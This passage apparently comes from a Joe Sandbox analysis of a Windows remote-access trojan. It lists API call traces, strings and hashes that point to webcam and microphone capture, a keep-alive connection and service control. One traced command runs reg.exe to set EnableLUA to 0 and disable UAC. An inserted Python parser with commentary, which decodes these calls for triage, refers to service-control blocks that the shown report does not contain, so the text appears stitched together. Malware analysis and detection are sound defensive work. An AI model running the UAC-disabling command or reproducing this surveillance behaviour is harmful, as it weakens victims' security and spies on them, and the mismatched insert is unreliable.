            • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
            APIs
            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
            • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
            • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$CloseCreateHandleSizeSleep
            • String ID: h G
            • API String ID: 1958988193-3300504347
            • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
            • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
            • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
            • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
            APIs
            • RegisterClassExA.USER32(00000030), ref: 0041B310
            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
            • GetLastError.KERNEL32 ref: 0041B335
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ClassCreateErrorLastRegisterWindow
            • String ID: 0$MsgWindowClass
            • API String ID: 2877667751-2410386613
            • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
            • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
            • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
            • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
            APIs
            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
              • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
            • _UnwindNestedFrames.LIBCMT ref: 00437631
            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
            • CallCatchBlock.LIBVCRUNTIME ref: 00437667
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
            • String ID: /zC
            • API String ID: 2633735394-4132788633
            • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
            • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
            • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
            • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
            APIs
            • GetSystemMetrics.USER32(0000004C), ref: 004173AA
            • GetSystemMetrics.USER32(0000004D), ref: 004173B0
            • GetSystemMetrics.USER32(0000004E), ref: 004173B6
            • GetSystemMetrics.USER32(0000004F), ref: 004173BC
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: MetricsSystem
            • String ID: ]tA
            • API String ID: 4116985748-3517819141
            • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
            • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
            • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
            • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
            APIs
            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
            Strings
            • C:\Windows\System32\cmd.exe, xrefs: 0040E542
            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseHandle$CreateProcess
            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
            • API String ID: 2922976086-4183131282
            • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
            • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
            • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
            • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
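The four service-control blocks above (refs 00418C3E, 00418A6B, 00418B6F and 00418BD6) and this CreateProcessA block read more easily once the raw argument values are named: OpenServiceW is opened with dwDesiredAccess 0x2, 0x20 and 0x40 (SERVICE_CHANGE_CONFIG, SERVICE_STOP, SERVICE_PAUSE_CONTINUE), ControlService is sent dwControl 1, 2 and 3 (stop, pause, continue), ChangeServiceConfigW sets dwStartType 4 (SERVICE_DISABLED), and the cmd.exe /k reg.exe command line writes EnableLUA=0 under the UAC policy key, which disables UAC after the next restart. The Python below is an added example, not Joe Sandbox code and not part of the sample: it parses "APIs" entries in the one-line form this report prints and applies those decodings. The sample lines are copied from this page; the constant tables are winsvc.h values. The two 000000FF entries in the ChangeServiceConfigW call sit in the dwServiceType and dwErrorControl positions, where an unchanged field would be SERVICE_NO_CHANGE (0xFFFFFFFF); whether the report truncated that value cannot be checked from this page, so only dwStartType is decoded.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: "APIs" entries copied from the function blocks of this report
# (service control, the UAC policy tamper, one subcall entry, one entry without arguments).
SAMPLE_LINES = r"""
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
  • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
• GetLastError.KERNEL32 ref: 0040AA28
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
"""

# Entry layout: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)", then "ref:" with the address of the call instruction.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                      # call-site address
    parent: Optional[str] = None  # set for "Part of subcall function" entries


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "Strings" or "Memory Dump Source", blank lines
        raw = m.group("args")
        # Caveat: arguments are not quoted in the report, so a string argument
        # that itself contains a comma would be split here.
        args = raw.split(",") if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("parent")))
    return calls


def as_int(arg: str) -> Optional[int]:
    # Only 8-digit hex decodes: '?' means the value was not recovered, and a
    # string argument such as 'ADD' must not be mistaken for hex.
    return int(arg, 16) if HEX8.match(arg) else None


# winsvc.h values for the argument positions that are stable across the entries.
SERVICE_ACCESS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG", 0x4: "SERVICE_QUERY_STATUS",
                  0x8: "SERVICE_ENUMERATE_DEPENDENTS", 0x10: "SERVICE_START", 0x20: "SERVICE_STOP",
                  0x40: "SERVICE_PAUSE_CONTINUE", 0x80: "SERVICE_INTERROGATE", 0x100: "SERVICE_USER_DEFINED_CONTROL"}
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE", 3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
              3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}


def flag_names(value: int, table: Dict[int, str]) -> str:
    names = [n for bit, n in table.items() if value & bit]
    return "|".join(names) if names else "none"


# (API, zero-based argument index, label, decoder): OpenServiceW dwDesiredAccess,
# ControlService dwControl, ChangeServiceConfigW dwStartType. Other positions are
# left alone because the recovered lists are padded with '?' and return addresses.
DECODERS = [
    ("OpenServiceW", 2, "access", lambda v: f"{v:#x} = {flag_names(v, SERVICE_ACCESS)}"),
    ("ControlService", 1, "control", lambda v: SERVICE_CONTROL.get(v, "unknown")),
    ("ChangeServiceConfigW", 2, "start type", lambda v: START_TYPE.get(v, "unknown")),
]


def decode_service_calls(calls: List[ApiCall]) -> List[str]:
    out = []
    for c in calls:
        for api, idx, label, decode in DECODERS:
            if c.name == api and len(c.args) > idx:
                v = as_int(c.args[idx])
                if v is not None:
                    out.append(f"{c.ref}: {api} {label} {decode(v)}")
    return out


UAC_POLICY_KEY = r"software\microsoft\windows\currentversion\policies\system"


def find_uac_tamper(calls: List[ApiCall]) -> List[str]:
    """Flag CreateProcess* whose lpApplicationName/lpCommandLine (first two
    arguments) write EnableLUA=0 under the UAC policy key."""
    out = []
    for c in calls:
        if c.name.startswith("CreateProcess"):
            cmdline = ",".join(c.args[:2]).lower()
            if UAC_POLICY_KEY in cmdline and "enablelua" in cmdline and re.search(r"/d\s+0\b", cmdline):
                out.append(f"{c.ref}: UAC disabled via reg.exe (EnableLUA=0)")
    return out
```

Joe Sandbox recovers argument lists heuristically (the '?' entries and the trailing return addresses show this), so decode only the positions the API prototype fixes and treat the rest as noise; the same parser can be pointed at the other "APIs" blocks of the report once their prototypes are added to DECODERS.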
            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
            • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
            • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
            • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
            • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
            APIs
            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            Strings
            • Connection KeepAlive | Disabled, xrefs: 004050D9
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
            • String ID: Connection KeepAlive | Disabled
            • API String ID: 2993684571-3818284553
            • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
            • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
            • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
            • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
            APIs
            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
            • GetProcAddress.KERNEL32(00000000), ref: 00401403
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: GetCursorInfo$User32.dll$`#v
            • API String ID: 1646373207-1032071883
            • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
            • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
            • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
            • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
            • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
            • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
            • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
            APIs
            • Sleep.KERNEL32(00000000,?), ref: 004044A4
              • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: H_prologSleep
            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
            • API String ID: 3469354165-3547787478
            • Opcode ID: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
            • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
            • Opcode Fuzzy Hash: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
            • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
            APIs
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            • _free.LIBCMT ref: 00442318
            • _free.LIBCMT ref: 0044232F
            • _free.LIBCMT ref: 0044234E
            • _free.LIBCMT ref: 00442369
            • _free.LIBCMT ref: 00442380
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$AllocateHeap
            • String ID:
            • API String ID: 3033488037-0
            • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
            • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
            • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
            • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
            APIs
            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
            • _free.LIBCMT ref: 004468EC
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 00446AB8
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
            • String ID:
            • API String ID: 1286116820-0
            • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
            • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
            • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
            • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free
            • String ID:
            • API String ID: 269201875-0
            • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
            • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
            • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
            • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
            • __alloca_probe_16.LIBCMT ref: 0044E391
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
            • __freea.LIBCMT ref: 0044E3FD
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 313313983-0
            • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
            • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
            • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
            • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
            APIs
            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
            • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
            • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
            • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
            • waveInStart.WINMM ref: 00401CDE
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
            • String ID:
            • API String ID: 1356121797-0
            • Opcode ID: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
            • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
            • Opcode Fuzzy Hash: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
            • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
            • _free.LIBCMT ref: 0044C59F
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
            • String ID:
            • API String ID: 336800556-0
            • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
            • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
            • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
            • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
            APIs
            • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
            • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
            • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
            • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$CloseHandle$CreatePointerWrite
            • String ID:
            • API String ID: 1852769593-0
            • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
            • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
            • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
            • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
            • int.LIBCPMT ref: 0040FBE8
              • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
              • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
            • std::_Facet_Register.LIBCPMT ref: 0040FC28
            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
            • String ID:
            • API String ID: 2536120697-0
            • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
            • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
            • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
            • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
            APIs
            • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
            • _free.LIBCMT ref: 004457E3
            • _free.LIBCMT ref: 0044580A
